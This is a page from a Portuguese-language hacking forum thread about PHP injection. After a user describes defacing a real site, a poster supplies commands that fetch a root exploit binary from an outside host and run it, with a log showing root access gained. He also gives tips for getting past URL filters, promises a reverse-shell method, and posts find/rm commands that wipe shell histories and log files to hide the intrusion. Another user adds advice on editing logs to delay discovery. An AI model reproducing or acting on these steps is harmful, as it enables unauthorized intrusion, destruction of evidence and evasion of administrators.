Página 2 de 25 PrimeiroPrimeiro 123412 ... ÚltimoÚltimo
Resultados 11 a 20 de 250
  1. #11
    Hacker
    Data de Ingresso
    Nov 2005
    Localização
    World Wild Web
    Posts
    1.213
    Citação Postado originalmente por Quicky
    daew dsoul... tu que manja disso.. podes me responder algo bem simples?

    tipo... eu jí fiz um deface (A) mas tipo.. nao rootei a shell nao.. só pus o meu index e renomei o index original pra index2. e deixei os arquivos.. pois bem.. caso eu quisesse rootar.. como faria??

    sysname: Linux
    nodename: ux01.9netweb.it
    release: 2.4.20-28.7smp
    version: #1 SMP Thu Dec 18 11:18:31 EST 2003
    machine: i686
    Script Current User: ux011148
    PHP Version: 4.1.1
    User Info: uid(1401) euid(1401) gid(1401)
    Current Path: /ux01/1/148/public_html/PHP-Nuke/modules/My_eGallery/public
    Server IP: 66.71.135.148
    Web Server: Apache/1.3.28 (Unix) mod_perl/1.29
    tu precisa jí ter rodado backdoor, ter acesso por telnet..
    tenta usar esse exploit:
    wget http://www.dsoulzin.net/tmp/brk2
    chmod 777 brk2
    ./brk2
    e se der tudo certo, nenhum erro digita id que vai estar root :P
    mesmo kernel:

    Código:
    [nobody@test2 tmp]: uname -a
    Linux test2 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
    [nobody@test2 tmp]: wget http://www.dsoulzin.net/tmp/brk2
    --15:00:24--  http://www.dsoulzin.net/tmp/brk2
               => `brk2'
    Resolving www.dsoulzin.net... done.
    Connecting to www.dsoulzin.net[68.142.234.59]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 456,205 [application/octet-stream]
    
    100%[====================================>] 456,205      10.74M/s    ETA 00:00
    
    15:00:27 (10.74 MB/s) - `brk2' saved [456205/456205]
    
    [nobody@test2 tmp]: chmod 777 brk2
    [nobody@test2 tmp]: ./brk2
    sh-2.05b# id
    uid=0(root) gid=0(root)



    p.s.: que bom que gostaram do tuto

  2. #12
    Administrador Avatar de souzadc
    Data de Ingresso
    Jan 2005
    Localização
    BA - Salvador Capital City
    Posts
    5.856
    Cara,

    Muito boa sua explicação. Parabéns e continue contribuindo.

    Sem mais!!!
    :arrow:

    Dúvidas somente no fórum, NÃO respondo via MP's, MSN, Orkut, E-mail e afins. Obrigado!

  3. #13
    tipo
    como eu faco pra pegar uma shell?

    vlw

  4. #14
    Hacker
    Data de Ingresso
    Nov 2005
    Localização
    World Wild Web
    Posts
    1.213
    roda a backdoor nela e entra por telnet ^^
    expliquei ali sobre o r0nin

  5. #15
    Membro
    Data de Ingresso
    Jun 2005
    Posts
    264
    Muitas pessoas jí pergutaram sobre um bóm tópico sobre php injection. Parabéns dsoul. COntinue assim.

    Abraços

  6. #16
    o problema eh q nem todos os sites q sao vulneraveis a php injection aceita o wget... vamo esperar o dsoul falar + ai .. abraços.

  7. #17
    Hacker
    Data de Ingresso
    Nov 2005
    Localização
    World Wild Web
    Posts
    1.213
    existem sites que se existe wget, curl ou outros comandos de linux na url ele te joga para a pígina de Forbidden, existem alguns comandos que as vezes não são bloqueados, por isso sempre tentem wget, curl -O, lynx, get, fetch..
    ou usem a cabeça para não colocar esses comandos no cmd, e sim dentro de algum código de fonte :lol:
    daqui a pouco vou explicar como rodar uma conexão reversa para seu ip, se a maquina tiver firewall e não deixa você se conectar a ela, manda ela se conectar a você :wink:

  8. #18
    dsoul e quanto a nossa segurança, caso eu esteja falando besteira me corrija. mas é bom fazer sempre isso usando um proxy?
    qual o metodo q vc recomenda para nos protegermos?

  9. #19
    Hacker
    Data de Ingresso
    Nov 2005
    Localização
    World Wild Web
    Posts
    1.213
    bem, eu nunca me protegi com proxyes.. mas é sempre mais seguro.. se tiver proxy rapida o que custa colocar?
    quando se tem root é sempre bom deletar os logs:

    find / -name .bash_history -exec rm -rf {} \;
    find / -name .bash_logout -exec rm -rf {} \;
    find / -name log* -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;


    creio que isso jí dí ^^

    sem mais :arrow:

  10. #20
    Newbie
    Data de Ingresso
    Nov 2005
    Localização
    RJ - Vila da Penha
    Posts
    123
    Citação Postado originalmente por dsoul
    bem, eu nunca me protegi com proxyes.. mas é sempre mais seguro.. se tiver proxy rapida o que custa colocar?
    quando se tem root é sempre bom deletar os logs:

    find / -name .bash_history -exec rm -rf {} \;
    find / -name .bash_logout -exec rm -rf {} \;
    find / -name log* -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;


    creio que isso jí dí ^^

    sem mais :arrow:

    Melhor ainda, NUNCA DELETE UM LOG SEMPRE EDITE, assim ñ hí muita suspeita de um administrador descobrir uma invasão, ou simplesmente retarda a descoberta vlw.
    :wink:

Tópicos Similares

  1. [Video Aula] SQL Injection (tirando duvidas)
    Por jefersonflus no fórum Vídeos
    Respostas: 1
    Último Post: 13 Nov 2008, 00:23
  2. Sql Injection - Fim da Duvidas
    Por inacio_mecena no fórum Matérias e Artigos
    Respostas: 1
    Último Post: 15 Dec 2005, 13:29

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •